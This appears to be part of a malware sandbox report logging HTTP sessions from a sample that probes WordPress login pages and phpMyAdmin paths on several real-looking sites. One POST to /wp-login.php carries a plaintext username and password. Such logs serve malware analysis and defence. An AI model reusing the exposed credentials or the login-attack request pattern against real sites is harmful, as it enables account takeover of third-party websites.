                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.52 (Ubuntu)Set-Cookie: PHPSESSID=m4dctrurspuesp0b7frt4pped2; path=/; HttpOnlylocation: https://ce-logic.com/Security/login?BackURL=%2Fadmin%2Fpages%2Fx-controller: SilverStr


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    320192.168.2.463746162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC352OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://mydirectlender.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 137
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC137OUTData Raw: 6c 6f 67 3d 6a 65 73 74 65 70 26 70 77 64 3d 46 6f 72 77 61 72 64 32 30 32 31 25 32 31 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=jestep&pwd=Forward2021%21&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fmydirectlender.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC527INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; securex-frame-options
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC841INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 53 74 61 67 69 6e 67 20 66 6f 72 20 4d 79 44 69 72 65 63 74 4c 65 6e 64 65 72 2e 63 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Staging for MyDirectLender.com &#8212; WordPress</title><meta name='robots' content='noindex, nofollow' /><scrip
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC6050INData Raw: 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f
                                                                                                                                                                                                    Data Ascii: nk rel='stylesheet' id='forms-css' href='https://mydirectlender.com/wp-admin/css/forms.min.css?ver=6.4.1' type='text/css' media='all' /><link rel='stylesheet' id='l10n-css' href='https://mydirectlender.com/wp-admin/css/l10n.min.css?ver=6.4.1' type='text/


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    321192.168.2.463583185.135.132.105443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC307INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:41 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    322192.168.2.463864172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC216OUTGET /wp-admin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://esoft.academy/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC636INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC733INData Raw: 37 64 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d33<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e
                                                                                                                                                                                                    Data Ascii: :void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c
                                                                                                                                                                                                    Data Ascii: !0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73
                                                                                                                                                                                                    Data Ascii: if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.s
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                    Data Ascii: [e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e)
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69
                                                                                                                                                                                                    Data Ascii: ndow.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator i
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65
                                                                                                                                                                                                    Data Ascii: )}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){le
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,cont
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26
                                                                                                                                                                                                    Data Ascii: i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    323192.168.2.46373295.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC302OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=4f36ac64dc73c26adfab9dad01788b38|11f187638643e13d7bd1963991fac52b; OF=9lma3oral9i39bi8q8vm70o157
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC371INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:42 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:
